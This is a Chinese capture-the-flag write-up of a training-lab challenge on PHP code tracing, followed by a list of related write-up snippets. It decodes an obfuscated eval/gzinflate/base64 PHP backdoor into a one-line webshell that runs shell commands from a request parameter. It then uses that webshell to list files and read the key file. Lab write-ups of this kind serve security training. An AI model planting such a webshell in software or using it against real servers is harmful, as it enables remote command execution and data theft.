打开发现提示key在根目录,且给出代码
<?php
eval(gzinflate(base64_decode(&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&)));
?> 
这是base64加密+压缩的编码
简单方法就是直接把eval改成echo输出
执行<?php
echo(gzinflate(base64_decode(‘40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==’)));
?>

得到echo `$_REQUEST[a]`;; ?>
发现有命令执行漏洞

直接给a传入 ls -al

ip/f.php?a=ls      显示所有文件

发现key,直接用cat没读出来(查看源码可看到),用tac读取得到key。

墨者学院 - PHP代码分析溯源(第4题)相关推荐

  1. 墨者学院 PHP代码分析溯源(第4题) 详解

    今天继续给大家介绍CTF通关writeup,本文主要内容是墨者学院 PHP代码分析溯源(第4题). 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负 ...

  2. 墨者学院-PHP代码分析溯源(第4题)

    PHP代码分析溯源(第4题) 难易程度:★★★ 题目类型:命令执行 使用工具:FireFox浏览器 1.打开靶场,看到一串php代码. 2.使用echo,运行一下代码. <?php echo(g ...

  3. 墨者学院 - WebShell代码分析溯源(第8题)

    审查代码 1.先找到黑页所在目录,观察同层级的其他文件命名和修改时间,选中可疑文件审计代码 2.没有新的发现,就去目录查找,根据最后的修改时间排查. C:\Users\BayernChenTutu\D ...

  4. 墨者学院 - PHP代码分析溯源(第2题)

    根据题干看了好久的php隐式转换... 还是毫无头绪... 这样的逻辑几乎是无解的... md5(QNKCDZO,32) = 0e830400451993494058024219903391 根据PH ...

  5. 墨者学院-编辑器漏洞分析溯源(第1题)

    编辑器漏洞分析溯源(第1题) 难易程度:★★ 题目类型:编辑器漏洞 使用工具:FireFox浏览器.burpsuite.菜刀 1.打开靶场,看到提示信息显示fckeditor. 2.首先查看fcked ...

  6. 墨者学院-Bash漏洞分析溯源

    Bash漏洞分析溯源 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器.wwwscan 1.打开靶场,根据题目思路找poc.cgi. 2.使用wwwscan扫一下 发现有目录/cgi ...

  7. WebShell代码分析溯源(第1题)墨者学院

    一.访问链接 二.下载系统源码后直接放到D盾里扫描,扫到后门文件 三.查看该木马文件 <?php error_reporting(0); $_GET['POST']($_POST['GET']) ...

  8. 墨者学院 - Bash漏洞分析溯源

    bash漏洞技术层面分析 漏洞起源: 漏洞信息最早来源于国外知名漏洞网站exploit-db下的第34765篇漏洞报告,其中出现了一条验证命令: env x='() { :;}; echo vulne ...

  9. [墨者学院] 日志文件分析溯源(脱裤的IP地址)

    背景介绍 某公司安全工程师发现公司有黑客入侵并拖库的痕迹,你能帮忙找一下黑客拖库的IP地址吗? 实训目标 1.了解mysql日志结构: 2.了解web日志结构: 解题方向 分析web日志和mysql日 ...

最新文章

  1. python(40):利用utf-8编码判断中文英文字符
  2. 【SLAM】gradslam(∇SLAM)开源:论文、代码全都有
  3. 《C语言程序设计》第三章练习与习题答案
  4. python改背景颜色_Python Opencv 通过轨迹(跟踪)栏实现更改整张图像的背景颜色
  5. 调查称谷歌占北美25%互联网流量
  6. 在SharePoint 2010中使用jQuery
  7. 一个程序,让你清楚区分二进制文件和文本文件
  8. GB28181协议--报警
  9. 服务器压力测试知识集锦
  10. PPT修改母版页码(亲测可用)
  11. java mp3合并_java如何实现把两首MP3一系列的帧进行合并
  12. 下载网页blob视频
  13. 关注奢交所兄弟品牌佰家当 17年积累撬动万亿民资市场
  14. 将ip地址转换成一个长整型(日志处理)
  15. 针对网页开发者的滚动锚定功能
  16. python学习之地址簿程序
  17. 玩转华为ENSP模拟器系列 | 配置LDP自动触发DoD请求功能示例
  18. [OpenCV实战]24 使用OpenCV进行曝光融合
  19. 【SqlServer系列】子查询
  20. IT人的职业素养与规划:程序开发 软件设计 职场心得 职业素养 职业规划

热门文章

  1. 【CV】第 6 章:使用迁移学习的视觉搜索
  2. 家庭防盗系统的各种类型选择选择及配置
  3. web3通过助记词获取所有关联的账号:公钥、私钥、地址
  4. Java之基于注解的Excel导出
  5. 设置goland的主题、字体和背景颜色
  6. 22 Herschel(1850)和麦克斯韦(1860)的推导
  7. 岛屿的最大面积leetcode题目
  8. 浙江师范大学计算机专业好吗,浙江师范大学计算机科学与技术怎么样
  9. 不下载英语包 Vista照样可以玩梦幻桌面
  10. Timeline 3D for Mac(时间轴记事本软件)